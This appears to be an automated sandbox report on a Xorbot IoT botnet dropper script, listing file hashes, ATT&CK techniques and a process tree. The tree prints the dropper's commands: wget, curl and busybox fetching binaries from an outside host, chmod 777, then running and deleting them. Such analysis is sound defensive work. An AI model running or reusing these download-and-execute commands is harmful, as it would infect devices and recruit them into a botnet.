xorbot | 052180cf83663519a84b6600bcf33de2cd382c9ddf58e63f4410406d9bb18dbd

Analysis

max time kernel
149s
max time network
11s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
02-12-2024 07:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

0d2c2bba48d2650adc694e38c0ad363a
SHA1

fa930798d5511e7d5bf147b6f4e43bcac6e2d2d3
SHA256

052180cf83663519a84b6600bcf33de2cd382c9ddf58e63f4410406d9bb18dbd
SHA512

509d5fc4d8fe3d00857fa23ca093204655f5670dda7ffb38ccc9361f767985830c9134525a6de4434feb2947d254ea4fc8e0f6546337919ba0833b819ea65739
SSDEEP

192:Fn6ODAYLhaZ52QM0eitMEgGUWq5oAyfXM52QMEeitME8tS5oAyfXJ6ODAYO:Fn6ODAYLhMwQMDGUWgwQMz16ODAYO

Score

10^/10

xorbot antivm botnet defense_evasion discovery trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

Processes:

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmod

pid	Process
684	chmod

Executes dropped EXE 1 IoCs

Processes:

ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq

ioc	pid	Process
/tmp/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq	685	ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq

Checks CPU configuration 1 TTPs 2 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurl

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurl

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 7 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

curlwgetcurlbusyboxogNKg0N25yozLHIpWy5KCPME0eqTyUyEXqrmwget

pid	Process
690	curl
656	wget
664	curl
683	busybox
685	ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
688	rm
689	wget

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curl

description	ioc	Process
File opened for modification	/tmp/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:649
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:655
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  2⤵
  - System Network Configuration Discovery
  PID:656
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:664
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  2⤵
  - System Network Configuration Discovery
  PID:683
- /bin/chmod
  chmod 777 ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  2⤵
  - File and Directory Permissions Modification
  PID:684
- /tmp/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  ./ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:685
- /bin/rm
  rm ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq
  2⤵
  - System Network Configuration Discovery
  PID:688
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8
  2⤵
  - System Network Configuration Discovery
  PID:689
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/CHxffsNKUjIOsajtCElmZ60kv7SefXTGK8
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:690

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/ogNKg0N25yozLHIpWy5KCPME0eqTyUyEXq

Filesize
107KB

MD5
eb9c3a0de91fcf16ba17cb24608df68c

SHA1
09d95a7d70d5e115d103be51edff7c498d272fac

SHA256
dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

SHA512
9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

Download Submit